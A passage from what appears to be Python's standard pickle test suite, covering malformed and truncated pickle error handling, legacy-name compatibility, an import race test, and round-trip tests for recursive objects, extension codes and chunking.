self.assertEqual(self.loads(dumped), '\u20ac\x00')
def test_misc_get(self):
self.check_unpickling_error(pickle.UnpicklingError, b'g0\np0')
self.check_unpickling_error(pickle.UnpicklingError, b'jens:')
self.check_unpickling_error(pickle.UnpicklingError, b'hens:')
self.assert_is_copy([(100,), (100,)],
self.loads(b'((Kdtp0\nh\x00l.))'))
def test_binbytes8(self):
dumped = b'\x80\x04\x8e\4\0\0\0\0\0\0\0\xe2\x82\xac\x00.'
self.assertEqual(self.loads(dumped), b'\xe2\x82\xac\x00')
def test_binunicode8(self):
dumped = b'\x80\x04\x8d\4\0\0\0\0\0\0\0\xe2\x82\xac\x00.'
self.assertEqual(self.loads(dumped), '\u20ac\x00')
def test_bytearray8(self):
dumped = b'\x80\x05\x96\x03\x00\x00\x00\x00\x00\x00\x00xxx.'
self.assertEqual(self.loads(dumped), bytearray(b'xxx'))
@requires_32b
def test_large_32b_binbytes8(self):
dumped = b'\x80\x04\x8e\4\0\0\0\1\0\0\0\xe2\x82\xac\x00.'
self.check_unpickling_error((pickle.UnpicklingError, OverflowError),
dumped)
@requires_32b
def test_large_32b_bytearray8(self):
dumped = b'\x80\x05\x96\4\0\0\0\1\0\0\0\xe2\x82\xac\x00.'
self.check_unpickling_error((pickle.UnpicklingError, OverflowError),
dumped)
@requires_32b
def test_large_32b_binunicode8(self):
dumped = b'\x80\x04\x8d\4\0\0\0\1\0\0\0\xe2\x82\xac\x00.'
self.check_unpickling_error((pickle.UnpicklingError, OverflowError),
dumped)
def test_get(self):
pickled = b'((lp100000\ng100000\nt.'
unpickled = self.loads(pickled)
self.assertEqual(unpickled, ([],)*2)
self.assertIs(unpickled[0], unpickled[1])
def test_binget(self):
pickled = b'(]q\xffh\xfft.'
unpickled = self.loads(pickled)
self.assertEqual(unpickled, ([],)*2)
self.assertIs(unpickled[0], unpickled[1])
def test_long_binget(self):
pickled = b'(]r\x00\x00\x01\x00j\x00\x00\x01\x00t.'
unpickled = self.loads(pickled)
self.assertEqual(unpickled, ([],)*2)
self.assertIs(unpickled[0], unpickled[1])
def test_dup(self):
pickled = b'((l2t.'
unpickled = self.loads(pickled)
self.assertEqual(unpickled, ([],)*2)
self.assertIs(unpickled[0], unpickled[1])
def test_negative_put(self):
# Issue #12847
dumped = b'Va\np-1\n.'
self.check_unpickling_error(ValueError, dumped)
@requires_32b
def test_negative_32b_binput(self):
# Issue #12847
dumped = b'\x80\x03X\x01\x00\x00\x00ar\xff\xff\xff\xff.'
self.check_unpickling_error(ValueError, dumped)
def test_badly_escaped_string(self):
self.check_unpickling_error(ValueError, b"S'\\'\n.")
def test_badly_quoted_string(self):
# Issue #17710
badpickles = [b"S'\n.",
b'S"\n.',
b'S\' \n.',
b'S" \n.',
b'S\'"\n.',
b'S"\'\n.',
b"S' ' \n.",
b'S" " \n.',
b"S ''\n.",
b'S ""\n.',
b'S \n.',
b'S\n.',
b'S.']
for p in badpickles:
self.check_unpickling_error(pickle.UnpicklingError, p)
def test_correctly_quoted_string(self):
goodpickles = [(b"S''\n.", ''),
(b'S""\n.', ''),
(b'S"\\n"\n.', '\n'),
(b"S'\\n'\n.", '\n')]
for p, expected in goodpickles:
self.assertEqual(self.loads(p), expected)
def test_frame_readline(self):
pickled = b'\x80\x04\x95\x05\x00\x00\x00\x00\x00\x00\x00I42\n.'
# 0: \x80 PROTO 4
# 2: \x95 FRAME 5
# 11: I INT 42
# 15: . STOP
self.assertEqual(self.loads(pickled), 42)
def test_compat_unpickle(self):
# xrange(1, 7)
pickled = b'\x80\x02c__builtin__\nxrange\nK\x01K\x07K\x01\x87R.'
unpickled = self.loads(pickled)
self.assertIs(type(unpickled), range)
self.assertEqual(unpickled, range(1, 7))
self.assertEqual(list(unpickled), [1, 2, 3, 4, 5, 6])
# reduce
pickled = b'\x80\x02c__builtin__\nreduce\n.'
self.assertIs(self.loads(pickled), functools.reduce)
# whichdb.whichdb
pickled = b'\x80\x02cwhichdb\nwhichdb\n.'
self.assertIs(self.loads(pickled), dbm.whichdb)
# Exception(), StandardError()
for name in (b'Exception', b'StandardError'):
pickled = (b'\x80\x02cexceptions\n' + name + b'\nU\x03ugh\x85R.')
unpickled = self.loads(pickled)
self.assertIs(type(unpickled), Exception)
self.assertEqual(str(unpickled), 'ugh')
# UserDict.UserDict({1: 2}), UserDict.IterableUserDict({1: 2})
for name in (b'UserDict', b'IterableUserDict'):
pickled = (b'\x80\x02(cUserDict\n' + name +
b'\no}U\x04data}K\x01K\x02ssb.')
unpickled = self.loads(pickled)
self.assertIs(type(unpickled), collections.UserDict)
self.assertEqual(unpickled, collections.UserDict({1: 2}))
def test_bad_stack(self):
badpickles = [
b'.', # STOP
b'0', # POP
b'1', # POP_MARK
b'2', # DUP
b'(2',
b'R', # REDUCE
b')R',
b'a', # APPEND
b'Na',
b'b', # BUILD
b'Nb',
b'd', # DICT
b'e', # APPENDS
b'(e',
b'ibuiltins\nlist\n', # INST
b'l', # LIST
b'o', # OBJ
b'(o',
b'p1\n', # PUT
b'q\x00', # BINPUT
b'r\x00\x00\x00\x00', # LONG_BINPUT
b's', # SETITEM
b'Ns',
b'NNs',
b't', # TUPLE
b'u', # SETITEMS
b'(u',
b'}(Nu',
b'\x81', # NEWOBJ
b')\x81',
b'\x85', # TUPLE1
b'\x86', # TUPLE2
b'N\x86',
b'\x87', # TUPLE3
b'N\x87',
b'NN\x87',
b'\x90', # ADDITEMS
b'(\x90',
b'\x91', # FROZENSET
b'\x92', # NEWOBJ_EX
b')}\x92',
b'\x93', # STACK_GLOBAL
b'Vlist\n\x93',
b'\x94', # MEMOIZE
]
for p in badpickles:
self.check_unpickling_error(self.bad_stack_errors, p)
def test_bad_mark(self):
badpickles = [
b'N(.', # STOP
b'N(2', # DUP
b'cbuiltins\nlist\n)(R', # REDUCE
b'cbuiltins\nlist\n()R',
b']N(a', # APPEND
# BUILD
b'cbuiltins\nValueError\n)R}(b',
b'cbuiltins\nValueError\n)R(}b',
b'(Nd', # DICT
b'N(p1\n', # PUT
b'N(q\x00', # BINPUT
b'N(r\x00\x00\x00\x00', # LONG_BINPUT
b'}NN(s', # SETITEM
b'}N(Ns',
b'}(NNs',
b'}((u', # SETITEMS
b'cbuiltins\nlist\n)(\x81', # NEWOBJ
b'cbuiltins\nlist\n()\x81',
b'N(\x85', # TUPLE1
b'NN(\x86', # TUPLE2
b'N(N\x86',
b'NNN(\x87', # TUPLE3
b'NN(N\x87',
b'N(NN\x87',
b']((\x90', # ADDITEMS
# NEWOBJ_EX
b'cbuiltins\nlist\n)}(\x92',
b'cbuiltins\nlist\n)(}\x92',
b'cbuiltins\nlist\n()}\x92',
# STACK_GLOBAL
b'Vbuiltins\n(Vlist\n\x93',
b'Vbuiltins\nVlist\n(\x93',
b'N(\x94', # MEMOIZE
]
for p in badpickles:
self.check_unpickling_error(self.bad_stack_errors, p)
def test_truncated_data(self):
self.check_unpickling_error(EOFError, b'')
self.check_unpickling_error(EOFError, b'N')
badpickles = [
b'B', # BINBYTES
b'B\x03\x00\x00',
b'B\x03\x00\x00\x00',
b'B\x03\x00\x00\x00ab',
b'C', # SHORT_BINBYTES
b'C\x03',
b'C\x03ab',
b'F', # FLOAT
b'F0.0',
b'F0.00',
b'G', # BINFLOAT
b'G\x00\x00\x00\x00\x00\x00\x00',
b'I', # INT
b'I0',
b'J', # BININT
b'J\x00\x00\x00',
b'K', # BININT1
b'L', # LONG
b'L0',
b'L10',
b'L0L',
b'L10L',
b'M', # BININT2
b'M\x00',
# b'P', # PERSID
# b'Pabc',
b'S', # STRING
b"S'abc'",
b'T', # BINSTRING
b'T\x03\x00\x00',
b'T\x03\x00\x00\x00',
b'T\x03\x00\x00\x00ab',
b'U', # SHORT_BINSTRING
b'U\x03',
b'U\x03ab',
b'V', # UNICODE
b'Vabc',
b'X', # BINUNICODE
b'X\x03\x00\x00',
b'X\x03\x00\x00\x00',
b'X\x03\x00\x00\x00ab',
b'(c', # GLOBAL
b'(cbuiltins',
b'(cbuiltins\n',
b'(cbuiltins\nlist',
b'Ng', # GET
b'Ng0',
b'(i', # INST
b'(ibuiltins',
b'(ibuiltins\n',
b'(ibuiltins\nlist',
b'Nh', # BINGET
b'Nj', # LONG_BINGET
b'Nj\x00\x00\x00',
b'Np', # PUT
b'Np0',
b'Nq', # BINPUT
b'Nr', # LONG_BINPUT
b'Nr\x00\x00\x00',
b'\x80', # PROTO
b'\x82', # EXT1
b'\x83', # EXT2
b'\x84\x01',
b'\x84', # EXT4
b'\x84\x01\x00\x00',
b'\x8a', # LONG1
b'\x8b', # LONG4
b'\x8b\x00\x00\x00',
b'\x8c', # SHORT_BINUNICODE
b'\x8c\x03',
b'\x8c\x03ab',
b'\x8d', # BINUNICODE8
b'\x8d\x03\x00\x00\x00\x00\x00\x00',
b'\x8d\x03\x00\x00\x00\x00\x00\x00\x00',
b'\x8d\x03\x00\x00\x00\x00\x00\x00\x00ab',
b'\x8e', # BINBYTES8
b'\x8e\x03\x00\x00\x00\x00\x00\x00',
b'\x8e\x03\x00\x00\x00\x00\x00\x00\x00',
b'\x8e\x03\x00\x00\x00\x00\x00\x00\x00ab',
b'\x96', # BYTEARRAY8
b'\x96\x03\x00\x00\x00\x00\x00\x00',
b'\x96\x03\x00\x00\x00\x00\x00\x00\x00',
b'\x96\x03\x00\x00\x00\x00\x00\x00\x00ab',
b'\x95', # FRAME
b'\x95\x02\x00\x00\x00\x00\x00\x00',
b'\x95\x02\x00\x00\x00\x00\x00\x00\x00',
b'\x95\x02\x00\x00\x00\x00\x00\x00\x00N',
]
for p in badpickles:
self.check_unpickling_error(self.truncated_errors, p)
@threading_helper.reap_threads
def test_unpickle_module_race(self):
# https://bugs.python.org/issue34572
locker_module = dedent("""
import threading
barrier = threading.Barrier(2)
""")
locking_import_module = dedent("""
import locker
locker.barrier.wait()
class ToBeUnpickled(object):
pass
""")
os.mkdir(TESTFN)
self.addCleanup(shutil.rmtree, TESTFN)
sys.path.insert(0, TESTFN)
self.addCleanup(sys.path.remove, TESTFN)
with open(os.path.join(TESTFN, "locker.py"), "wb") as f:
f.write(locker_module.encode('utf-8'))
with open(os.path.join(TESTFN, "locking_import.py"), "wb") as f:
f.write(locking_import_module.encode('utf-8'))
self.addCleanup(forget, "locker")
self.addCleanup(forget, "locking_import")
import locker
pickle_bytes = (
b'\x80\x03clocking_import\nToBeUnpickled\nq\x00)\x81q\x01.')
# Then try to unpickle two of these simultaneously
# One of them will cause the module import, and we want it to block
# until the other one either:
# - fails (before the patch for this issue)
# - blocks on the import lock for the module, as it should
results = []
barrier = threading.Barrier(3)
def t():
# This ensures the threads have all started
# presumably barrier release is faster than thread startup
barrier.wait()
results.append(pickle.loads(pickle_bytes))
t1 = threading.Thread(target=t)
t2 = threading.Thread(target=t)
t1.start()
t2.start()
barrier.wait()
# could have delay here
locker.barrier.wait()
t1.join()
t2.join()
from locking_import import ToBeUnpickled
self.assertEqual(
[type(x) for x in results],
[ToBeUnpickled] * 2)
class AbstractPickleTests(unittest.TestCase):
# Subclass must define self.dumps, self.loads.
optimized = False
_testdata = AbstractUnpickleTests._testdata
def setUp(self):
pass
assert_is_copy = AbstractUnpickleTests.assert_is_copy
def test_misc(self):
# test various datatypes not tested by testdata
for proto in protocols:
x = myint(4)
s = self.dumps(x, proto)
y = self.loads(s)
self.assert_is_copy(x, y)
x = (1, ())
s = self.dumps(x, proto)
y = self.loads(s)
self.assert_is_copy(x, y)
x = initarg(1, x)
s = self.dumps(x, proto)
y = self.loads(s)
self.assert_is_copy(x, y)
# XXX test __reduce__ protocol?
def test_roundtrip_equality(self):
expected = self._testdata
for proto in protocols:
s = self.dumps(expected, proto)
got = self.loads(s)
self.assert_is_copy(expected, got)
# There are gratuitous differences between pickles produced by
# pickle and cPickle, largely because cPickle starts PUT indices at
# 1 and pickle starts them at 0. See XXX comment in cPickle's put2() --
# there's a comment with an exclamation point there whose meaning
# is a mystery. cPickle also suppresses PUT for objects with a refcount
# of 1.
def dont_test_disassembly(self):
from io import StringIO
from pickletools import dis
for proto, expected in (0, DATA0_DIS), (1, DATA1_DIS):
s = self.dumps(self._testdata, proto)
filelike = StringIO()
dis(s, out=filelike)
got = filelike.getvalue()
self.assertEqual(expected, got)
def test_recursive_list(self):
l = []
l.append(l)
for proto in protocols:
s = self.dumps(l, proto)
x = self.loads(s)
self.assertIsInstance(x, list)
self.assertEqual(len(x), 1)
self.assertIs(x[0], x)
def test_recursive_tuple_and_list(self):
t = ([],)
t[0].append(t)
for proto in protocols:
s = self.dumps(t, proto)
x = self.loads(s)
self.assertIsInstance(x, tuple)
self.assertEqual(len(x), 1)
self.assertIsInstance(x[0], list)
self.assertEqual(len(x[0]), 1)
self.assertIs(x[0][0], x)
def test_recursive_dict(self):
d = {}
d[1] = d
for proto in protocols:
s = self.dumps(d, proto)
x = self.loads(s)
self.assertIsInstance(x, dict)
self.assertEqual(list(x.keys()), [1])
self.assertIs(x[1], x)
def test_recursive_dict_key(self):
d = {}
k = K(d)
d[k] = 1
for proto in protocols:
s = self.dumps(d, proto)
x = self.loads(s)
self.assertIsInstance(x, dict)
self.assertEqual(len(x.keys()), 1)
self.assertIsInstance(list(x.keys())[0], K)
self.assertIs(list(x.keys())[0].value, x)
def test_recursive_set(self):
y = set()
k = K(y)
y.add(k)
for proto in range(4, pickle.HIGHEST_PROTOCOL + 1):
s = self.dumps(y, proto)
x = self.loads(s)
self.assertIsInstance(x, set)
self.assertEqual(len(x), 1)
self.assertIsInstance(list(x)[0], K)
self.assertIs(list(x)[0].value, x)
def test_recursive_list_subclass(self):
y = MyList()
y.append(y)
for proto in range(2, pickle.HIGHEST_PROTOCOL + 1):
s = self.dumps(y, proto)
x = self.loads(s)
self.assertIsInstance(x, MyList)
self.assertEqual(len(x), 1)
self.assertIs(x[0], x)
def test_recursive_dict_subclass(self):
d = MyDict()
d[1] = d
for proto in range(2, pickle.HIGHEST_PROTOCOL + 1):
s = self.dumps(d, proto)
x = self.loads(s)
self.assertIsInstance(x, MyDict)
self.assertEqual(list(x.keys()), [1])
self.assertIs(x[1], x)
def test_recursive_dict_subclass_key(self):
d = MyDict()
k = K(d)
d[k] = 1
for proto in range(2, pickle.HIGHEST_PROTOCOL + 1):
s = self.dumps(d, proto)
x = self.loads(s)
self.assertIsInstance(x, MyDict)
self.assertEqual(len(list(x.keys())), 1)
self.assertIsInstance(list(x.keys())[0], K)
self.assertIs(list(x.keys())[0].value, x)
def test_recursive_inst(self):
i = C()
i.attr = i
for proto in protocols:
s = self.dumps(i, proto)
x = self.loads(s)
self.assertIsInstance(x, C)
self.assertEqual(dir(x), dir(i))
self.assertIs(x.attr, x)
def test_recursive_multi(self):
l = []
d = {1:l}
i = C()
i.attr = d
l.append(i)
for proto in protocols:
s = self.dumps(l, proto)
x = self.loads(s)
self.assertIsInstance(x, list)
self.assertEqual(len(x), 1)
self.assertEqual(dir(x[0]), dir(i))
self.assertEqual(list(x[0].attr.keys()), [1])
self.assertTrue(x[0].attr[1] is x)
def check_recursive_collection_and_inst(self, factory):
h = H()
y = factory([h])
h.attr = y
for proto in protocols:
s = self.dumps(y, proto)
x = self.loads(s)
self.assertIsInstance(x, type(y))
self.assertEqual(len(x), 1)
self.assertIsInstance(list(x)[0], H)
self.assertIs(list(x)[0].attr, x)
def test_recursive_list_and_inst(self):
self.check_recursive_collection_and_inst(list)
def test_recursive_tuple_and_inst(self):
self.check_recursive_collection_and_inst(tuple)
def test_recursive_dict_and_inst(self):
self.check_recursive_collection_and_inst(dict.fromkeys)
def test_recursive_set_and_inst(self):
self.check_recursive_collection_and_inst(set)
def test_recursive_frozenset_and_inst(self):
self.check_recursive_collection_and_inst(frozenset)
def test_recursive_list_subclass_and_inst(self):
self.check_recursive_collection_and_inst(MyList)
def test_recursive_tuple_subclass_and_inst(self):
self.check_recursive_collection_and_inst(MyTuple)
def test_recursive_dict_subclass_and_inst(self):
self.check_recursive_collection_and_inst(MyDict.fromkeys)
def test_recursive_set_subclass_and_inst(self):
self.check_recursive_collection_and_inst(MySet)
def test_recursive_frozenset_subclass_and_inst(self):
self.check_recursive_collection_and_inst(MyFrozenSet)
def test_unicode(self):
endcases = ['', '<\\u>', '<\\\u1234>', '<\n>',
'<\\>', '<\\\U00012345>',
# surrogates
'<\udc80>']
for proto in protocols:
for u in endcases:
p = self.dumps(u, proto)
u2 = self.loads(p)
self.assert_is_copy(u, u2)
def test_unicode_high_plane(self):
t = '\U00012345'
for proto in protocols:
p = self.dumps(t, proto)
t2 = self.loads(p)
self.assert_is_copy(t, t2)
def test_bytes(self):
for proto in protocols:
for s in b'', b'xyz', b'xyz'*100:
p = self.dumps(s, proto)
self.assert_is_copy(s, self.loads(p))
for s in [bytes([i]) for i in range(256)]:
p = self.dumps(s, proto)
self.assert_is_copy(s, self.loads(p))
for s in [bytes([i, i]) for i in range(256)]:
p = self.dumps(s, proto)
self.assert_is_copy(s, self.loads(p))
def test_bytearray(self):
for proto in protocols:
for s in b'', b'xyz', b'xyz'*100:
b = bytearray(s)
p = self.dumps(b, proto)
bb = self.loads(p)
self.assertIsNot(bb, b)
self.assert_is_copy(b, bb)
if proto <= 3:
# bytearray is serialized using a global reference
self.assertIn(b'bytearray', p)
self.assertTrue(opcode_in_pickle(pickle.GLOBAL, p))
elif proto == 4:
self.assertIn(b'bytearray', p)
self.assertTrue(opcode_in_pickle(pickle.STACK_GLOBAL, p))
elif proto == 5:
self.assertNotIn(b'bytearray', p)
self.assertTrue(opcode_in_pickle(pickle.BYTEARRAY8, p))
def test_ints(self):
for proto in protocols:
n = sys.maxsize
while n:
for expected in (-n, n):
s = self.dumps(expected, proto)
n2 = self.loads(s)
self.assert_is_copy(expected, n2)
n = n >> 1
def test_long(self):
for proto in protocols:
# 256 bytes is where LONG4 begins.
for nbits in 1, 8, 8*254, 8*255, 8*256, 8*257:
nbase = 1 << nbits
for npos in nbase-1, nbase, nbase+1:
for n in npos, -npos:
pickle = self.dumps(n, proto)
got = self.loads(pickle)
self.assert_is_copy(n, got)
# Try a monster. This is quadratic-time in protos 0 & 1, so don't
# bother with those.
nbase = int("deadbeeffeedface", 16)
nbase += nbase << 1000000
for n in nbase, -nbase:
p = self.dumps(n, 2)
got = self.loads(p)
# assert_is_copy is very expensive here as it precomputes
# a failure message by computing the repr() of n and got,
# so we just do the check ourselves.
self.assertIs(type(got), int)
self.assertEqual(n, got)
def test_float(self):
test_values = [0.0, 4.94e-324, 1e-310, 7e-308, 6.626e-34, 0.1, 0.5,
3.14, 263.44582062374053, 6.022e23, 1e30]
test_values = test_values + [-x for x in test_values]
for proto in protocols:
for value in test_values:
pickle = self.dumps(value, proto)
got = self.loads(pickle)
self.assert_is_copy(value, got)
@run_with_locale('LC_ALL', 'de_DE', 'fr_FR')
def test_float_format(self):
# make sure that floats are formatted in a locale-independent way with proto 0
self.assertEqual(self.dumps(1.2, 0)[0:3], b'F1.')
def test_reduce(self):
for proto in protocols:
inst = AAA()
dumped = self.dumps(inst, proto)
loaded = self.loads(dumped)
self.assertEqual(loaded, REDUCE_A)
def test_getinitargs(self):
for proto in protocols:
inst = initarg(1, 2)
dumped = self.dumps(inst, proto)
loaded = self.loads(dumped)
self.assert_is_copy(inst, loaded)
def test_metaclass(self):
a = use_metaclass()
for proto in protocols:
s = self.dumps(a, proto)
b = self.loads(s)
self.assertEqual(a.__class__, b.__class__)
def test_dynamic_class(self):
a = create_dynamic_class("my_dynamic_class", (object,))
copyreg.pickle(pickling_metaclass, pickling_metaclass.__reduce__)
for proto in protocols:
s = self.dumps(a, proto)
b = self.loads(s)
self.assertEqual(a, b)
self.assertIs(type(a), type(b))
def test_structseq(self):
import time
import os
t = time.localtime()
for proto in protocols:
s = self.dumps(t, proto)
u = self.loads(s)
self.assert_is_copy(t, u)
t = os.stat(os.curdir)
s = self.dumps(t, proto)
u = self.loads(s)
self.assert_is_copy(t, u)
if hasattr(os, "statvfs"):
t = os.statvfs(os.curdir)
s = self.dumps(t, proto)
u = self.loads(s)
self.assert_is_copy(t, u)
def test_ellipsis(self):
for proto in protocols:
s = self.dumps(..., proto)
u = self.loads(s)
self.assertIs(..., u)
def test_notimplemented(self):
for proto in protocols:
s = self.dumps(NotImplemented, proto)
u = self.loads(s)
self.assertIs(NotImplemented, u)
def test_singleton_types(self):
# Issue #6477: Test that types of built-in singletons can be pickled.
singletons = [None, ..., NotImplemented]
for singleton in singletons:
for proto in protocols:
s = self.dumps(type(singleton), proto)
u = self.loads(s)
self.assertIs(type(singleton), u)
# Tests for protocol 2
def test_proto(self):
for proto in protocols:
pickled = self.dumps(None, proto)
if proto >= 2:
proto_header = pickle.PROTO + bytes([proto])
self.assertTrue(pickled.startswith(proto_header))
else:
self.assertEqual(count_opcode(pickle.PROTO, pickled), 0)
oob = protocols[-1] + 1 # a future protocol
build_none = pickle.NONE + pickle.STOP
badpickle = pickle.PROTO + bytes([oob]) + build_none
try:
self.loads(badpickle)
except ValueError as err:
self.assertIn("unsupported pickle protocol", str(err))
else:
self.fail("expected bad protocol number to raise ValueError")
def test_long1(self):
x = 12345678910111213141516178920
for proto in protocols:
s = self.dumps(x, proto)
y = self.loads(s)
self.assert_is_copy(x, y)
self.assertEqual(opcode_in_pickle(pickle.LONG1, s), proto >= 2)
def test_long4(self):
x = 12345678910111213141516178920 << (256*8)
for proto in protocols:
s = self.dumps(x, proto)
y = self.loads(s)
self.assert_is_copy(x, y)
self.assertEqual(opcode_in_pickle(pickle.LONG4, s), proto >= 2)
def test_short_tuples(self):
# Map (proto, len(tuple)) to expected opcode.
expected_opcode = {(0, 0): pickle.TUPLE,
(0, 1): pickle.TUPLE,
(0, 2): pickle.TUPLE,
(0, 3): pickle.TUPLE,
(0, 4): pickle.TUPLE,
(1, 0): pickle.EMPTY_TUPLE,
(1, 1): pickle.TUPLE,
(1, 2): pickle.TUPLE,
(1, 3): pickle.TUPLE,
(1, 4): pickle.TUPLE,
(2, 0): pickle.EMPTY_TUPLE,
(2, 1): pickle.TUPLE1,
(2, 2): pickle.TUPLE2,
(2, 3): pickle.TUPLE3,
(2, 4): pickle.TUPLE,
(3, 0): pickle.EMPTY_TUPLE,
(3, 1): pickle.TUPLE1,
(3, 2): pickle.TUPLE2,
(3, 3): pickle.TUPLE3,
(3, 4): pickle.TUPLE,
}
a = ()
b = (1,)
c = (1, 2)
d = (1, 2, 3)
e = (1, 2, 3, 4)
for proto in protocols:
for x in a, b, c, d, e:
s = self.dumps(x, proto)
y = self.loads(s)
self.assert_is_copy(x, y)
expected = expected_opcode[min(proto, 3), len(x)]
self.assertTrue(opcode_in_pickle(expected, s))
def test_singletons(self):
# Map (proto, singleton) to expected opcode.
expected_opcode = {(0, None): pickle.NONE,
(1, None): pickle.NONE,
(2, None): pickle.NONE,
(3, None): pickle.NONE,
(0, True): pickle.INT,
(1, True): pickle.INT,
(2, True): pickle.NEWTRUE,
(3, True): pickle.NEWTRUE,
(0, False): pickle.INT,
(1, False): pickle.INT,
(2, False): pickle.NEWFALSE,
(3, False): pickle.NEWFALSE,
}
for proto in protocols:
for x in None, False, True:
s = self.dumps(x, proto)
y = self.loads(s)
self.assertTrue(x is y, (proto, x, s, y))
expected = expected_opcode[min(proto, 3), x]
self.assertTrue(opcode_in_pickle(expected, s))
def test_newobj_tuple(self):
x = MyTuple([1, 2, 3])
x.foo = 42
x.bar = "hello"
for proto in protocols:
s = self.dumps(x, proto)
y = self.loads(s)
self.assert_is_copy(x, y)
def test_newobj_list(self):
x = MyList([1, 2, 3])
x.foo = 42
x.bar = "hello"
for proto in protocols:
s = self.dumps(x, proto)
y = self.loads(s)
self.assert_is_copy(x, y)
def test_newobj_generic(self):
for proto in protocols:
for C in myclasses:
B = C.__base__
x = C(C.sample)
x.foo = 42
s = self.dumps(x, proto)
y = self.loads(s)
detail = (proto, C, B, x, y, type(y))
self.assert_is_copy(x, y) # XXX revisit
self.assertEqual(B(x), B(y), detail)
self.assertEqual(x.__dict__, y.__dict__, detail)
def test_newobj_proxies(self):
# NEWOBJ should use the __class__ rather than the raw type
classes = myclasses[:]
# Cannot create weakproxies to these classes
for c in (MyInt, MyTuple):
classes.remove(c)
for proto in protocols:
for C in classes:
B = C.__base__
x = C(C.sample)
x.foo = 42
p = weakref.proxy(x)
s = self.dumps(p, proto)
y = self.loads(s)
self.assertEqual(type(y), type(x)) # rather than type(p)
detail = (proto, C, B, x, y, type(y))
self.assertEqual(B(x), B(y), detail)
self.assertEqual(x.__dict__, y.__dict__, detail)
def test_newobj_not_class(self):
# Issue 24552
global SimpleNewObj
save = SimpleNewObj
o = SimpleNewObj.__new__(SimpleNewObj)
b = self.dumps(o, 4)
try:
SimpleNewObj = 42
self.assertRaises((TypeError, pickle.UnpicklingError), self.loads, b)
finally:
SimpleNewObj = save
# Register a type with copyreg, with extension code extcode. Pickle
# an object of that type. Check that the resulting pickle uses opcode
# (EXT[124]) under proto 2, and not in proto 1.
def produce_global_ext(self, extcode, opcode):
e = ExtensionSaver(extcode)
try:
copyreg.add_extension(__name__, "MyList", extcode)
x = MyList([1, 2, 3])
x.foo = 42
x.bar = "hello"
# Dump using protocol 1 for comparison.
s1 = self.dumps(x, 1)
self.assertIn(__name__.encode("utf-8"), s1)
self.assertIn(b"MyList", s1)
self.assertFalse(opcode_in_pickle(opcode, s1))
y = self.loads(s1)
self.assert_is_copy(x, y)
# Dump using protocol 2 for test.
s2 = self.dumps(x, 2)
self.assertNotIn(__name__.encode("utf-8"), s2)
self.assertNotIn(b"MyList", s2)
self.assertEqual(opcode_in_pickle(opcode, s2), True, repr(s2))
y = self.loads(s2)
self.assert_is_copy(x, y)
finally:
e.restore()
def test_global_ext1(self):
self.produce_global_ext(0x00000001, pickle.EXT1) # smallest EXT1 code
self.produce_global_ext(0x000000ff, pickle.EXT1) # largest EXT1 code
def test_global_ext2(self):
self.produce_global_ext(0x00000100, pickle.EXT2) # smallest EXT2 code
self.produce_global_ext(0x0000ffff, pickle.EXT2) # largest EXT2 code
self.produce_global_ext(0x0000abcd, pickle.EXT2) # check endianness
def test_global_ext4(self):
self.produce_global_ext(0x00010000, pickle.EXT4) # smallest EXT4 code
self.produce_global_ext(0x7fffffff, pickle.EXT4) # largest EXT4 code
self.produce_global_ext(0x12abcdef, pickle.EXT4) # check endianness
def test_list_chunking(self):
n = 10 # too small to chunk
x = list(range(n))
for proto in protocols:
s = self.dumps(x, proto)
y = self.loads(s)
self.assert_is_copy(x, y)
num_appends = count_opcode(pickle.APPENDS, s)
self.assertEqual(num_appends, proto > 0)
n = 2500 # expect at least two chunks when proto > 0
x = list(range(n))
for proto in protocols:
s = self.dumps(x, proto)
y = self.loads(s)
self.assert_is_copy(x, y)
num_appends = count_opcode(pickle.APPENDS, s)
if proto == 0:
self.assertEqual(num_appends, 0)
else:
self.assertTrue(num_appends >= 2)
def test_dict_chunking(self):
n = 10 # too small to chunk
x = dict.fromkeys(range(n))
for proto in protocols:
s = self.dumps(x, proto)
self.assertIsInstance(s, bytes_types)
y = self.loads(s)
self.assert_is_copy(x, y)
num_setitems = count_opcode(pickle.SETITEMS, s)
self.assertEqual(num_setitems, proto > 0)
n = 2500 # expect at least two chunks when proto > 0
x = dict.fromkeys(range(n))
for proto in protocols:
s = self.dumps(x, proto)
y = self.loads(s)
self.assert_is_copy(x, y)
num_setitems = count_opcode(pickle.SETITEMS, s)
if proto == 0:
self.assertEqual(num_setitems, 0)
else:
self.assertTrue(num_setitems >= 2)
def test_set_chunking(self):
n = 10 # too small to chunk
x = set(range(n))
for proto in protocols:
s = self.dumps(x, proto)
y = self.loads(s)
self.assert_is_copy(x, y)
num_additems = count_opcode(pickle.ADDITEMS, s)
if proto < 4:
self.assertEqual(num_additems, 0)
else:
self.assertEqual(num_additems, 1)
n = 2500 # expect at least two chunks when proto >= 4
x = set(range(n))
for proto in protocols:
s = self.dumps(x, proto)
y = self.loads(s)
self.assert_is_copy(x, y)
num_additems = count_opcode(pickle.ADDITEMS, s)
if proto < 4:
self.assertEqual(num_additems, 0)
else:
self.assertGreaterEqual(num_additems, 2)
def test_simple_newobj(self):
x = SimpleNewObj.__new__(SimpleNewObj, 0xface) # avoid __init__
x.abc = 666
for proto in protocols:
with self.subTest(proto=proto):
s = self.dumps(x, proto)
if proto < 1:
self.assertIn(b'\nI64206', s) # INT
else:
self.assertIn(b'M\xce\xfa', s) # BININT2
self.assertEqual(opcode_in_pickle(pickle.NEWOBJ, s),
2 <= proto)
self.assertFalse(opcode_in_pickle(pickle.NEWOBJ_EX, s))
y = self.loads(s) # will raise TypeError if __init__ called
self.assert_is_copy(x, y)
def test_complex_newobj(self):
x = ComplexNewObj.__new__(ComplexNewObj, 0xface) # avoid __init__
x.abc = 666
for proto in protocols:
with self.subTest(proto=proto):
s = self.dumps(x, proto)
if proto < 1:
self.assertIn(b'\nI64206', s) # INT
elif proto < 2:
self.assertIn(b'M\xce\xfa', s) # BININT2
elif proto < 4:
self.assertIn(b'X\x04\x00\x00\x00FACE', s) # BINUNICODE
else:
self.assertIn(b'\x8c\x04FACE', s) # SHORT_BINUNICODE
self.assertEqual(opcode_in_pickle(pickle.NEWOBJ, s),
2 <= proto)
self.assertFalse(opcode_in_pickle(pickle.NEWOBJ_EX, s))
y = self.loads(s) # will raise TypeError if __init__ called
self.assert_is_copy(x, y)
def test_complex_newobj_ex(self):
x = ComplexNewObjEx.__new__(ComplexNewObjEx, 0xface) # avoid __init__
x.abc = 666
for proto in protocols:
with self.subTest(proto=proto):
s = self.dumps(x, proto)
if proto < 1:
self.assertIn(b'\nI64206', s) # INT
elif proto < 2:
self.assertIn(b'M\xce\xfa', s) # BININT2
elif proto < 4:
